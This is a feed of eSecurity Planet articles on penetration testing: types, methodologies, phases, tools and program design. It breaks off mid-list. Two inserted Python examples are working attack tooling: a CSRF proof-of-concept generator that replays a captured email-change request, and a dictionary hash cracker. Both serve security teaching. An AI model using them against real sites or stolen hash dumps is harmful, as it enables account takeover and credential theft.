Ray Fernandez, Author at eSecurity Planet
https://www.esecurityplanet.com/author/rfernandez/
Industry-leading guidance and analysis for how to keep your business secure. Feed last updated Fri, 01 Dec 2023 13:48:22 +0000.

7 Types of Penetration Testing: Guide to Pentest Methods & Types
https://www.esecurityplanet.com/networks/types-of-penetration-testing/
Published Wed, 28 Jun 2023 19:11:45 +0000

The post 7 Types of Penetration Testing: Guide to Pentest Methods & Types appeared first on eSecurity Planet.

Penetration tests are vital components of vulnerability management programs. In these tests, white hat hackers try to find and exploit vulnerabilities in your systems to help you stay one step ahead of cyberattackers.

Because these tests use the same techniques as criminal hackers, which are illegal without authorization, pentest providers sign a contract detailing their roles, goals, and responsibilities. To make sure the exercise is effective and doesn’t inadvertently cause harm, all parties to a pentest need to understand the type of testing to be done and the methods used. This not only focuses the test on the architectures that need to be prioritized, it also gives all sides a clear understanding of what is being tested and how it will be tested.

Here we’ll discuss penetration testing types, methods, and determining which tests to run. For an overview of our pentest coverage, start with What Is Penetration Testing? Complete Guide & Steps.

Also read: What Is a Pentest Framework? Top 7 Frameworks Explained

7 Types of Penetration Testing

Here we’ll cover seven types of penetration tests. As enterprise IT environments have expanded to include mobile and IoT devices and cloud and edge technology, new types of tests have emerged to address new risks, but the same general principles and techniques apply.

Additionally, tests can be internal or external and with or without authentication. Whatever approach and parameters you set, make sure that expectations are clear before you start.

While many penetration testing processes begin with reconnaissance, which involves gathering information on network vulnerabilities and entry points, it’s ideal to begin by mapping the network. This ensures the entirety of the network and its endpoints are marked for testing and evaluation.

7 Types of Penetration Testing from eSecurity Planet.

1. Network tests

Some organizations differentiate internal from external network security tests. External tests use only publicly available information and try to exploit the assets an organization exposes to the internet. Internal tests simulate attacks that come from within: they adopt the mindset of a malicious insider, or of an attacker who already has a foothold, and test how well internal networks resist exploitation, lateral movement, and privilege escalation.

Internal and external network testing is the most common type of test. If an attacker can breach a network, the risks are very high. Penetration testers will try to bypass firewalls, test routers, evade intrusion detection and prevention systems (IDS/IPS), scan for open ports and proxy services, and look for all types of network vulnerabilities.

Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference

2. Social engineering tests

Social engineering is a technique used by cyber criminals to trick users into giving away credentials or sensitive information. Attackers usually contact workers, targeting those with administrative or high-level access via email, calls, social media, and other approaches.

Most cyberattacks today start with social engineering, usually phishing email or smishing (phishing by SMS). Organizations that want to ensure that their human security is strong will encourage a security culture and train their workers. But a fundamental component of an effective human security culture is putting it to the test. While automated phishing tests can help security teams, penetration testers can go much further and use the same social engineering tools criminals use.

Penetration testers may run these simulations with prior knowledge of the organization, or without it to make them more realistic. This also allows them to test how the organization’s security team reacts and supports users during and after a social engineering attack.

3. Web application tests

Web-based applications are critical to the operation of almost every organization. During web application testing, ethical hackers attempt to discover vulnerabilities and exploit them as far as the rules of engagement allow. The goal of the test is to compromise the web application itself and report the possible consequences of the breach.

Web application tests cover the application itself and its client-side components: browsers, plugins, and legacy technologies such as ActiveX, Silverlight, scriptlets, and Java applets. The applications under test may be written in Java, PHP, .NET, or other languages. Application programming interfaces (APIs) are also in scope, along with XML interfaces, MySQL and Oracle databases, and other back-end connections and systems. Mobile applications also need to be tested in their own environments.

These tests are complex because web applications are interactive, exposed online, and built from many components. Threats evolve constantly, and new applications often rely on open-source code that is not always reviewed for security, while attackers keep finding new ways to break into web applications. Penetration testers have to take all of these elements into account.

See the Top Web Application Firewalls

4. Wireless network tests

Companies rely on wireless networks to connect endpoints, IoT devices and more, and wireless networks have become popular targets for cyber criminals. Penetration testers will verify the wireless encryption protocols in use, check beacon frames and captured traffic, search for access points and hotspots (including rogue ones), and attempt MAC address spoofing to bypass access controls.

Wireless networks are often neglected, with weak passwords and permissive settings left in place by security teams and managers. Penetration testers will try to brute force passwords and prey on misconfigurations. Tests may also check resilience to denial-of-service (DoS) attacks, in which a network or service is flooded with traffic until it fails; because DoS testing can disrupt production, it is normally excluded from scope unless explicitly agreed in the contract.

Finally, as companies embark on digital transformation and modernization, threats to IoT, sensors, cameras, mobile devices, and other endpoints intensify. Hackers will try to access critical assets through any of these new points, and the expansion of the digital surface works in their favor. Therefore, penetration tests that cover wireless security must be exhaustive.

5. Physical and edge computing tests

Not every threat to a company happens remotely. Many attacks can be accelerated, or are only possible, when the attacker has physical access to a device. With the rise of edge computing, as businesses build data centers closer to their operations, physical testing has become more relevant.

White hat hackers will test door security systems, access cards, locks, cameras, and sensors, and attempt to impersonate personnel. They will also verify how safe devices, data centers, and edge computing networks are when an attacker can physically access them. These tests can be executed with the full knowledge of the security team or without it.

6. Cloud security tests

Private and public clouds offer many benefits for companies, but they also give cyber criminals opportunities. Many organizations have business-critical assets in the cloud that, if breached, can bring their operations to a complete halt. Companies may also store backups and other important data in these environments.

While cloud vendors offer robust built-in security features, cloud penetration testing has become a must. Cloud pentests require advance planning with the cloud provider, because the provider’s own infrastructure is off-limits to white hat hackers and only the customer’s resources may be tested.

Cipher explains that penetration testing in the Microsoft Cloud must comply with the Microsoft Cloud Unified Penetration Testing Rules of Engagement, and that a pentest on Amazon Web Services (AWS) has required filling out the AWS Vulnerability / Penetration Testing Request Form. These policies change: AWS now permits testing of many of its core services without prior approval, while still prohibiting DoS testing, so confirm the provider’s current penetration testing policy before scoping the engagement.

Cloud penetration tests will examine security, applications and APIs, access, storage, encryption, virtual machines (VMs), operating systems (OSs) and updates, Secure Shell (SSH) and Remote Desktop Protocol (RDP) remote administration, and misconfigurations and passwords.

See the Best Cloud, Container and Data Lake Vulnerability Scanning Tools

7. Red team vs. blue team

Penetration tests often use a military-inspired technique in which the red team acts as the attacker and the blue team responds as the defending security team. This holistic approach makes penetration tests more realistic and measures not just the weaknesses, exploits, and threats, but also how security teams react.

While some organizations hire experts to act as blue teams, those who have in-house security teams can use this opportunity to upskill their workers. Security teams can learn how to respond more rapidly, understand what an actual attack looks like, and work to shut down the penetration tester before they simulate damage.

There are many variations of red and blue team tests. Blue teams can be given information about what the attacker will do or have to figure it out as it happens. Sometimes the blue team is informed of the time of the simulation or penetration test; other times, they are not. Penetration testers can give insights on how in-house security teams are responding and offer recommendations to strengthen their actions using this technique.


Penetration Testing Methods and Approaches

There are three main testing methods or approaches. These are designed for companies to set priorities, set the scope of their tests — comprehensive or limited — and manage the time and costs. The three approaches are black, white, and gray box penetration tests.

Black box penetration tests

Black box penetration tests are the most complex to execute. In these tests, the organization shares no information with the pentester. The tester has to identify and map the full network, its systems, operating systems, and digital assets, as well as the company’s entire digital attack surface.

Due to their complexity and time-consuming characteristics, black box tests are among the most expensive. They can take more than a month to complete. Companies choose this type of test to create the most authentic scenario of how real-world cyberattacks operate.

White box penetration tests

In a white box test, the organization will share its IT architecture and information with the penetration tester or vendor, from network maps to credentials. This type of test commonly establishes priority assets to verify their weaknesses and flaws.

White box tests are also known as crystal or oblique box pen testing. They bring down the costs of penetration tests and save time. Additionally, they are used when an organization has already tested other parts of its networks and is looking to verify specific assets.

Gray box penetration tests

Gray box testing, or translucent box testing, takes place when an organization shares specific information with white hat hackers trying to exploit the system. Gray box tests usually attempt to simulate what an attack would be like when a hacker has obtained information to access the network. Typically, the data shared is login credentials.

To avoid the time and costs of a black box test that includes phishing, gray box tests give the testers the credentials from the start. These tests also simulate internal attacks. The goal of this test is not to test authentication security but to understand what can happen when an attacker is already inside and has breached the perimeter.

How to Determine What Tests to Run

The type of test an organization needs depends on several factors, including what needs to be tested and whether previous tests have been done as well as budget and time. It is not recommended to begin shopping for penetration testing services without having a clear idea of what needs to be tested.

Each type of test is designed for a specific purpose. The first question any organization needs to ask is what assets are business-critical for their operations. Once the critical assets and data have been compiled into an inventory, organizations need to look into where these assets are and how they are connected. Are they internal? Are they online or in the cloud? How many devices and endpoints can access them?

Knowing what is critical for operations, where it is stored, and how it is interconnected will define the type of test. Sometimes companies have already conducted exhaustive tests but are releasing new web applications and services. In that case, they should consider running white box tests scoped to the new apps only. Penetration testers can also help define the scope of the tests and provide insights into the mindset of a hacker.

Bottom Line: Types of Penetration Testing

Ultimately, the types of penetration tests you choose should reflect your most important assets and test their most important controls. Well chosen test parameters can give you the most important information you need — while leaving some budget for the inevitable cybersecurity improvements a good pentest report will recommend.

It’s essential that penetration tests not just identify weaknesses, security flaws, or misconfigurations. The best vendors will provide a list of what they discovered, what the consequences of the exploit could have been, and recommendations to strengthen security and close the gaps. Penetration tests play a vital role in cybersecurity and have proven critical for businesses to keep up to date with the ever-evolving global threat landscape.

Next: See the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools



What Is Penetration Testing? Complete Guide & Steps
https://www.esecurityplanet.com/networks/penetration-testing/
https://www.esecurityplanet.com/2017/04/25/penetration-testing-diy-or-hire-a-pen-tester/
Published Tue, 07 Mar 2023 18:00:00 +0000

The post What Is Penetration Testing? Complete Guide & Steps appeared first on eSecurity Planet.

Penetration tests are simulated cyber attacks executed by white hat hackers on systems and networks. The goal of these simulations is to detect vulnerabilities, misconfigurations, errors, and other weaknesses that real attackers could exploit.

Pentesters work closely with the organization whose security posture they are hired to improve. There are different types of penetration tests, methodologies and best practices that need to be followed for optimal results, and we’ll cover those here.

Different Methods and Types of Penetration Testing

When a company hires a penetration testing service, it will typically be offered three different types of simulations. Known as black, white, and gray box pentests, these differ in how much information is provided to the pentester before running the simulated attacks. Additionally, tests can be comprehensive or limited. Limited tests can focus on narrower targets such as networks, Internet of Things (IoT) devices, physical security, cloud security, web applications, or other system components.

White box pentest

In white box penetration testing, organizations provide white hat hackers — sometimes called ethical hackers — with all of the information on their systems and simulation targets. The information provided includes source code and user credentials, privileged administrative access, and other critical data, which can be used to simulate an internal attack. Since much of the access information is provided up front, these tests are less expensive than black box tests.

Black box pentest

These are the most time-consuming and costly types of penetration tests. However, they are also the most realistic tests. They come very close to the steps that real attackers go through. In black box tests, also known as blind tests, penetration testers are not given any information. They have to start by mapping the entire infrastructure to find weak entry points and identify where critical business assets are located.

Gray box pentest

In gray box tests, also known as translucent tests, the organization gives some information to the pentesters but does not provide full disclosure of the architecture. The information provided is usually an employee’s access credentials or knowledge of internal networks or applications.

Red and blue teams

In all three types of pentests, security teams and penetration testers can engage in what is known as a red-blue team strategy. Pentesters, acting as the red team, may inform the blue team (the security team) about the nature of the simulation in advance, or they may not. The red-blue team strategy allows security teams to learn what actual attacks look like and measure their response and performance.

Red and blue team exercises can go beyond individual pentests to include comprehensive, ongoing testing objectives. Their communications can also be facilitated by a third team, called a purple team, for optimal effectiveness.

Also read: Red Team vs Blue Team vs Purple Team: Differences Explained

Comprehensive and limited pentests

Finally, tests can be comprehensive, where organizations test their entire network, systems, and endpoints, or limited to specific infrastructure components. Comprehensive tests are rare, expensive, and hard to execute.

Because organizations usually have penetration testing programs that outline and schedule tests periodically, tests tend to be limited to one or a few components. Limited tests allow for a deeper dive into a particular environment, are used for updates and new applications, are more focused, and are cheaper and faster to run.

Depending on what limited tests focus on, they can be:

  • Network pentests
  • Wireless pentests
  • Physical pentests
  • Social engineering pentests
  • Client-side pentests
  • IoT pentests
  • Mobile pentests
  • Web pentests
  • Cloud pentests
  • Edge computing pentests

Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference

Starting a Pentesting Program

Most organizations hire outside help to conduct pentesting, but those with larger security teams could start their own internal program, with the added benefit that they may be able to carry out a more comprehensive program as a result.

Either way, it’s best to design your pentesting program internally so that you ensure your goals are met and the most critical assets protected.

For more on pentesting program design and assembling a team, read How to Implement a Penetration Testing Program in 10 Steps.

7 Steps of Penetration Testing

Companies hiring penetration services should also familiarize themselves with the tests’ seven phases. White hat hackers must have intimate knowledge of all steps, including the first and final steps, which are often left out.

The phases of penetration tests are:

  1. Pre-engagement
  2. Reconnaissance or open-source intelligence (OSINT) gathering
  3. Scanning or discovery
  4. Vulnerability assessment
  5. Exploitation (gaining access)
  6. Post-exploitation (maintaining access), reporting, and risk analysis
  7. Remediation

Further reading: Penetration Testing Phases & Steps Explained

The Five Different Penetration Testing Methodologies

Leading security organizations have developed five penetration testing methodologies that serve as a blueprint for testing environments. These include:

  • Open Web Application Security Project (OWASP)
  • National Institute of Standards and Technology (NIST)
  • Open-Source Security Testing Methodology Manual (OSSTMM)
  • Information System Security Assessment Framework (ISSAF)
  • Penetration Testing Execution Standard (PTES)

These methodologies provide clear direction on how pentests are conducted. Methodologies are exhaustive, detailed, and developed for different businesses and organizations. For example, some methods meet national security and federal standards, while others are focused on private companies.

Also read: What Is a Pentest Framework? Top 7 Frameworks Explained

NIST

Developed by NIST, an agency of the United States Department of Commerce, NIST Special Publication 800-115, Technical Guide to Information Security Testing and Assessment, is the most specific from start to finish. Companies that want to meet high security standards adopt this methodology for penetration testing. Following NIST guidance is also mandatory for US federal agencies and many of their contractors.

OSSTMM

Developed by the Institute for Security and Open Methodologies (ISECOM), the Open Source Security Testing Methodology Manual (OSSTMM) is the most popular pentest methodology. It is also specific, allowing white hat hackers to customize their tests to an organization’s particular demands. The widely used OSSTMM sets recognized standards for tests, is peer-reviewed, and is based on a scientific approach.

The OSSTMM guide is divided into several main sections and tests:

  • Data controls
  • Personnel security awareness
  • Fraud and social engineering control
  • Computer and telecommunications networks
  • Wireless devices
  • Mobile devices
  • Physical security access controls
  • Security processes
  • Physical locations, including buildings, perimeters, and military bases

ISSAF

The Information Systems Security Assessment Framework (ISSAF), created by the Open Information Systems Security Group (OISSG), is the go-to methodology for pentesters that need to use a lot of tools and must run entirely personalized penetration tests. The downside of ISSAF is that it is no longer updated, and keeping up to date is critical in an ever-evolving cyber threat landscape. Despite this, testers still turn to ISSAF to link different steps of the pentest process with various tools. Like all methodologies, it covers all stages from pretest to reporting.

ISSAF phases include:

  • Information gathering
  • Network mapping
  • Vulnerability identification
  • Penetration
  • Gaining access and privilege escalation
  • Enumerating further
  • Compromising remote users and sites
  • Maintaining access
  • Covering the tracks

OWASP

Developed by OWASP, this methodology is specifically designed for web and mobile applications, IoT devices, and application programming interfaces (APIs). It can not only help penetration testers but is also used in the early stages of app development. Additionally, the methodology is updated and helps the security community stay on top of the latest technologies.

The guide provides comprehensive guidelines for each penetration testing method, with over 66 controls to assess in total. The list below is often reproduced as the OWASP methodology, but these areas (AS/400 auditing, Cisco- and Citrix-specific testing, VoIP) are actually the section headings of a separate, network-oriented checklist, the Penetration Testing Framework published at vulnerabilityassessment.co.uk. OWASP’s own Web Security Testing Guide is organized by test category instead: information gathering, configuration and deployment management, identity management, authentication, authorization, session management, input validation, error handling, cryptography, business logic, client-side testing, and API testing. The network checklist’s major areas are:

  • Network footprinting (reconnaissance)
  • Discovery and probing
  • Enumeration
  • Password cracking
  • Vulnerability assessment
  • AS/400 auditing
  • Bluetooth-specific testing
  • Cisco-specific testing
  • Citrix-specific testing
  • Network backbone
  • Server-specific tests
  • VoIP (voice over Internet Protocol) security
  • Wireless penetration
  • Physical security
  • Final report

PTES

The PTES framework offers guidance on all stages of a pentest. It consists of seven main sections: pre-engagement interactions, intelligence gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.

Because these seven sections describe what to do rather than how, PTES also published a separate, detailed set of technical guidelines listing tools and techniques for each phase.

PCI DSS

And a bonus: The PCI Security Standards Council has also published penetration testing guidance for organizations that fall under the PCI DSS standard, which itself requires internal and external penetration tests at least annually and after significant changes to the cardholder data environment.

Also Read: Network Protection: How to Secure a Network

Pros and Cons of Penetration Testing

Like all security solutions and approaches, penetration tests have benefits, risks, and challenges. The most significant advantage of penetration testing is that it simulates what a real human attacker would do. Automated security tools cannot reproduce the creativity and judgment of a skilled attacker, so penetration testers are vital for providing technical insight into what attackers can actually achieve.

Penetration testing’s other benefits include detecting vulnerabilities, errors, and weaknesses. Penetration tests are also flexible and can be customized. This allows organizations to test different scenarios and adapt to modern threats as they are released into the wild. Tests can also reveal the consequences an error or misconfiguration might have.

Automated tools are good at detecting errors, but they typically don’t offer insight into what would happen if an attacker exploited a vulnerability. With pentests, the most expert testers will also provide remediation recommendations. This allows organizations to understand not only where their weak points are, but also how to fix them and take action.

On the other hand, penetration tests also have some drawbacks. Even if you use free tools, pentesting involves the expense of hiring security pros or consultants. And those pros need to clean up when they’re done, removing any backdoors or anything else they may have installed to get a foothold in the network. And of course reporting has to be good to fix the flaws they do find.

The efficiency of the test will depend on the penetration testers and the skills they bring to the table. Another challenge the sector faces is recognizing the importance of penetration tests and getting buy-in. While penetration testing started as a concept back in the 1970s, many organizations are still reluctant to run tests on their systems.

The lack of security culture and awareness of how pentesting has evolved and how effective it can be holds back many decision-makers. Trusting a penetration tester with your systems, sensitive data, and the critical assets your business runs on can also be a roadblock, especially because pentesters will simulate real attacks.

Top Pentesting Tools

There are numerous penetration test tools on the market; some are free to use, while others are commercial solutions. Some of the most popular and effective solutions pentesters use include Kali Linux, Burp Suite, Wireshark, and John the Ripper. Other popular penetration testing tools not covered in their own sections below include Hashcat, Nmap, and Invicti.

Kali Linux

Kali Linux is an open-source operating system maintained by Offensive Security that facilitates penetration testing, security forensics, and other activities. Kali Linux is an all-in-one system that includes roughly 600 open source security tools, including the following:

  • Nmap: Port scanner
  • Wireshark: Packet analyzer
  • Metasploit: Penetration testing framework with thousands of exploit modules
  • John the Ripper: Password cracker
  • Sqlmap: Automated SQL injection and database takeover
  • Aircrack-ng: For wireless local area network (LAN) penetration testing
  • OWASP ZAP: Web application security scanner
  • Burp Suite: Application security testing

Burp Suite

Burp Suite is a suite of application security testing tools developed by PortSwigger with free and paid license options. It includes the popular Burp Proxy, which sits as a man-in-the-middle (MitM) between the browser and the web server. With it, pentesters can inspect and modify HTTP requests and responses in transit to find exploitable vulnerabilities and data leaks in web applications.

With Burp Suite features, users can:

  • Test clickjacking attacks
  • Assess token strength
  • Do deep manual tests
  • Record results of automated attacks to adjust future attacks
  • Execute fast brute-forcing and fuzzing with custom sequences of HTTP requests containing multiple payload sets
  • Construct cross-site request forgery (CSRF) exploits, generate HTML exploits, and demonstrate CSRF attacks
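Burp’s CSRF PoC generator turns a captured request into an HTML page that resubmits it from a victim’s browser. As an added example, not Burp’s code or the article’s, the Python below parses a raw captured form POST (the request text is a constructed sample from a fictitious site), checks the conditions that make CSRF plausible (a plain form body, a session cookie, and no token-like parameter), and emits the auto-submitting form. The token-name heuristics are an assumption; a real token can have any name, so the check is a hint, not proof.

```python
import html
from urllib.parse import parse_qsl

# Constructed sample of a request captured in an intercepting proxy.
# The host, cookie and parameters are invented for the example.
CAPTURED_REQUEST = """POST /account/email HTTP/1.1
Host: shop.example.test
Cookie: session=abc123
Content-Type: application/x-www-form-urlencoded
Content-Length: 35

email=attacker%40evil.test&notify=1
"""

# Assumed substrings that commonly appear in anti-CSRF token parameter names.
TOKEN_PARAM_HINTS = ("csrf", "xsrf", "token", "nonce", "authenticity", "_token")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers (lower-cased keys)
    and the decoded form fields from the body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    request_line, *header_lines = head.split("\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    fields = parse_qsl(body.strip(), keep_blank_values=True)
    return method, path, headers, fields


def csrf_risk(headers, fields):
    """Heuristics for whether the request is a CSRF candidate.
    Returns (is_candidate, reasons); reasons is empty when nothing argues against it."""
    reasons = []
    ctype = headers.get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        # A cross-site <form> can only send urlencoded, multipart or text/plain bodies;
        # JSON and XML bodies need a CORS preflight, which the victim's browser blocks.
        reasons.append("body is not a plain form (%s); a cross-site form cannot send it"
                       % (ctype or "no content type"))
    token_fields = [n for n, _ in fields if any(h in n.lower() for h in TOKEN_PARAM_HINTS)]
    if token_fields:
        reasons.append("request carries a token-like field: %s" % ", ".join(token_fields))
    if "cookie" not in headers:
        reasons.append("no cookie: the action probably is not authenticated by the browser")
    return (not reasons), reasons


def build_poc(raw, scheme="https"):
    """Return an auto-submitting HTML form that replays the captured POST from
    the victim's browser, which attaches its own cookies to the request."""
    method, path, headers, fields = parse_request(raw)
    if method.upper() != "POST":
        raise ValueError("this generator only handles form POSTs")
    action = "%s://%s%s" % (scheme, headers["host"], path)
    inputs = "\n".join(
        '    <input type="hidden" name="%s" value="%s">'
        % (html.escape(n, quote=True), html.escape(v, quote=True))
        for n, v in fields)
    return (
        "<html><body>\n"
        '  <form id="csrf" method="POST" action="%s">\n%s\n  </form>\n'
        "  <script>document.getElementById('csrf').submit();</script>\n"
        "</body></html>\n" % (html.escape(action, quote=True), inputs))


if __name__ == "__main__":
    ok, why = csrf_risk(*parse_request(CAPTURED_REQUEST)[2:])
    print("candidate" if ok else "probably protected", why)
    print(build_poc(CAPTURED_REQUEST))
```

Even when the heuristics pass, the PoC only works if the session cookie is actually sent cross-site, so the SameSite attribute on that cookie is the next thing to check in the proxy.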

Burp in action

Also read: Getting Started with the Burp Suite: A Pentesting Tutorial

Wireshark

This open-source tool, whose source code is hosted on GitLab with a mirror on GitHub, is a network protocol analyzer. Using Wireshark, penetration testers can capture and decode live traffic from many link types, including Ethernet, token ring, loopback, and asynchronous transfer mode (ATM) connections, or analyze saved captures offline.

Other features include:

  • Deep inspection of hundreds of protocols, with display filters to isolate the traffic of interest
  • Decryption of protocols such as TLS, WPA/WPA2 and Kerberos when the keys are supplied
  • Reading and writing many capture file formats, including pcap and pcapng
  • A command-line companion, TShark, for scripted capture and analysis

John the Ripper

John the Ripper is a free password-cracking tool that supports 15 operating systems, including 11 from the Unix family, DOS, Win32, BeOS, and OpenVMS.

The tool can be customized, with features including:

  • Auto-detection of password hash types
  • Support for hashed password formats such as Unix crypt hashes, Kerberos/AFS, and Windows LAN Manager (LM) hashes
  • Ability to crack hashes based on DES, MD5, Blowfish (bcrypt), and MD4 (Windows NTLM)
  • Support for password hashes stored in databases and directory systems such as LDAP and MySQL
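John’s auto-detection of hash types and its wordlist mode are the two features in the list above that most shape an engagement. As an added example, not John the Ripper’s code, the Python below shows both in miniature: it identifies a format from the hash’s prefix or hex length, then runs a dictionary attack over the raw (unsalted) formats that hashlib can compute, hashing each candidate once per algorithm rather than once per user. The hashes are constructed in the script from known weak passwords; the sha512crypt and bcrypt entries are placeholders that only exercise detection, because cracking those formats belongs to a real cracker.

```python
import hashlib
import re


def _md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def _sha1(s):
    return hashlib.sha1(s.encode()).hexdigest()


def _sha256(s):
    return hashlib.sha256(s.encode()).hexdigest()


# Constructed sample "dump": raw hashes of weak passwords, plus two crypt-style
# placeholders that this example only identifies, never cracks.
SAMPLE_HASHES = {
    "alice": _md5("Summer2023"),
    "bob": _sha1("letmein"),
    "carol": _sha256("P@ssw0rd"),
    "dave": "$6$rounds=5000$saltsalt$" + "x" * 86,    # sha512crypt-shaped placeholder
    "erin": "$2b$12$" + "y" * 53,                      # bcrypt-shaped placeholder
    "frank": _sha256("correct horse battery staple"),  # not in the wordlist
}

# Constructed wordlist; a real engagement uses rockyou-sized lists plus rules.
WORDLIST = ["123456", "password", "letmein", "Summer2023", "P@ssw0rd", "qwerty"]

# Format detection modelled on how crackers do it: a "$id$" prefix wins,
# otherwise the hex length decides. Prefixes are checked first on purpose.
PREFIXED = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt"}
RAW_BY_LEN = {32: "raw-md5", 40: "raw-sha1", 64: "raw-sha256", 128: "raw-sha512"}
HASHLIB_FOR = {"raw-md5": "md5", "raw-sha1": "sha1", "raw-sha256": "sha256", "raw-sha512": "sha512"}


def detect_format(h):
    """Return a format name, or None if the string is not a recognised hash."""
    for prefix, name in PREFIXED.items():
        if h.startswith(prefix):
            return name
    if re.fullmatch(r"[0-9a-fA-F]+", h):
        return RAW_BY_LEN.get(len(h))
    return None


def crack(hashes, wordlist):
    """Dictionary attack over a {user: hash} dump.
    Returns (cracked: {user: password}, uncracked: {user: detected format or None})."""
    cracked, uncracked = {}, {}
    # Hash each candidate once per algorithm, not once per user. This reuse is
    # exactly why unsalted raw hashes are so much weaker than salted crypt formats.
    lookup = {}
    for fmt, algo in HASHLIB_FOR.items():
        lookup[fmt] = {hashlib.new(algo, w.encode()).hexdigest(): w for w in wordlist}
    for user, h in hashes.items():
        fmt = detect_format(h)
        if fmt not in HASHLIB_FOR:
            uncracked[user] = fmt  # salted crypt formats, or unrecognised strings
            continue
        pw = lookup[fmt].get(h.lower())
        if pw is not None:
            cracked[user] = pw
        else:
            uncracked[user] = fmt
    return cracked, uncracked


if __name__ == "__main__":
    found, rest = crack(SAMPLE_HASHES, WORDLIST)
    for u, p in found.items():
        print("%-6s %s" % (u, p))
    print("not cracked:", rest)
```

The uncracked entries are as informative as the cracked ones in a report: a dump that still holds bcrypt hashes after a dictionary run says something good about that system's password storage, whereas raw MD5 surviving only means the wordlist was too small.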

For more on the wide array of available pentesting tools, see the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools.

What to Do After a Penetration Test

Penetration tests do not end after white hat hackers detect vulnerabilities. Reporting and remediation are vital components that should never be left out. Top pentest vendors offer complete reports that provide a 360-degree view into the errors, the consequences, and recommendations to fix and patch security flaws.

Reporting also serves the security teams, IT, developers, workers, and top decision-makers. The whole organization should benefit from the report: the main goal of a penetration test is not simply to detect weaknesses but to improve security and reduce risk.

In addition, a good practice for penetration testers and organizations is to restore systems to the state they were in before the test. If pentesters modify configurations and settings, install software, or make any other alterations to the system, they must clean up and restore it.

Additionally, companies running penetration tests should be executing them within their pentest program and frameworks. After remediation, the pentest teams should monitor the security upgrades and patches and prepare to run the next scheduled test. Penetration testing is not a one-and-done process; it’s continual work.


Bottom Line: Penetration Testing

Penetration testing is a critically important cybersecurity practice that can find security holes before hackers do. Along with threat hunting, it’s a practice that can’t be done by tools alone; it requires a human element. And those people need to be trained and prepared to do the job right. It’s not an easy undertaking, but it’s one that every organization should do to the best extent possible.

To see pentest tools in action, read Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR.

How to Implement a Penetration Testing Program in 10 Steps (https://www.esecurityplanet.com/networks/penetration-testing-program/, Tue, 21 Feb 2023 01:11:04 +0000)

Penetration tests find security vulnerabilities before hackers do and are critical for keeping organizations safe from cyber threats.

You can either create your own pentesting program or hire an outside firm to do it for you. Penetration test services have become common, with many security companies offering them. But they can be expensive and should be done often, so if you have the expertise on staff, consider developing your own penetration testing program. The result will be greater control over this important vulnerability and risk management process, and a more knowledgeable and prepared security staff.

Once you’ve decided to put together your own pentesting team, the first step is to create a plan that assesses your most critical assets so you can secure them.

See the Best Penetration Testing Tools and the Top Open Source Penetration Testing Tools

How Does a Penetration Testing Program Work?

Penetration testing differs from vulnerability scanning by using human pentesters to probe for vulnerabilities as hackers would.

During penetration tests, security experts, also known as ethical or white hat hackers or “red teams,” simulate real attacks on a system. The simulations are designed for testers to identify vulnerabilities, errors, or weaknesses in network infrastructure before an attacker can exploit them. Known as an offensive security approach, penetration testing keeps organizations one step ahead of cyber criminals.

A penetration testing program goes beyond individual penetration tests and outlines a blueprint for an organization to follow. The program answers what, when, why, and where tests should run. Penetration testing programs should be ongoing, detailed, scheduled and revised as needed.

The program should define a series of pentests to identify and remediate vulnerabilities in a system. Security leaders will know how many penetration tests to run as well as where and when to run them because the penetration program has been outlined. Even if an organization outsources all of its penetration tests, the program will provide a clear route when engaging with a vendor, a bug bounty program, or white hat hackers offering penetration testing as a service.

Also read: Penetration Testing vs. Vulnerability Testing: An Important Difference

10 Steps for Building a Penetration Testing Program

In penetration testing, preparation is key. Asking vendors to run random tests against a system will not provide the information needed to evaluate and remediate flaws and improve performance and security.

It is essential to know the inside and out of penetration tests and what you expect to achieve. Designing a penetration test program can be overwhelming. Here are 10 simple steps that can guide you through the process.

1. Secure budget and human resources

While penetration tests are cost-effective and have important benefits, organizations must first secure the budget and ensure they have the human resources to run them. Because tests should be ongoing for a long time, this should be the first step an organization takes. Organizations must make sure they have all the resources they need to get them through the program.

2. Assemble a penetration test program team

The first thing an organization should do, even before starting to build the program, is to find the right team and talent. Define roles and responsibilities and ensure the team members have all the necessary skills and certifications. The team will also need to work with other departments and management to build the program.

As you assemble your team and think about your objectives, think about the tools you’ll need for your pentest targets, and find or train staff to run those tests. Think about the possible attack paths and important assets to protect, like Active Directory or a critical application database or code repository, and then decide on the tests you need to run to test their security.


3. Map the digital surface, and build an asset inventory

The penetration testing team should comprehensively map the entire digital infrastructure, networks, Internet of Things (IoT) devices, edge, and cloud resources. Additionally, the map should include a data and asset inventory with all relevant information about the data cycle, from input, generation, and gathering to distribution, sales, and disposal of data.

A clear vision of the entire system helps to quickly identify where each component is located and provides a bird’s-eye view of what needs protecting. Make a note of future projects and include them in the map and inventory.

4. Define business objectives

Like any other program in operations, pentesting should be aligned with the business’s mission, goals, and targets. Focus on assets critical for operations, such as a customer database or critical application. Business objectives may change over time and require revision. Therefore, the team must come back to this point as penetration tests are executed over time.

5. Set asset priorities

Business objectives may be to increase sales, adjust to an economic slowdown, pivot around disruptions, or prevent customer churn. Whatever the company’s objectives are, the security of the assets that drive those outcomes must be guaranteed and tested.

Identify asset priority using the data inventory and digital surface map. If there are future projects in development that are critical, make sure to include them.

Pentests can be done by brute force, also called a black box approach, simulating an attack where hackers know nothing of your systems; or by a white box approach, where they have knowledge of your system architecture. A blend of the two is called a gray box approach.

A brute force attack simulation would involve probing your network, web applications and users for weaknesses, while a white box approach might use sophisticated code analysis to probe an application for weaknesses.

6. Set level priorities

Your company will be running several periodic tests lasting several days or longer. Now that there is a clear idea of what needs to be secured, set priorities for the tests that need to happen first and those that follow down the line.

Additionally, running tests can be expensive, so consider spreading out tests for different systems depending on the priorities. Priorities usually include tests that check:

  • Vulnerability exploitation
  • Code execution
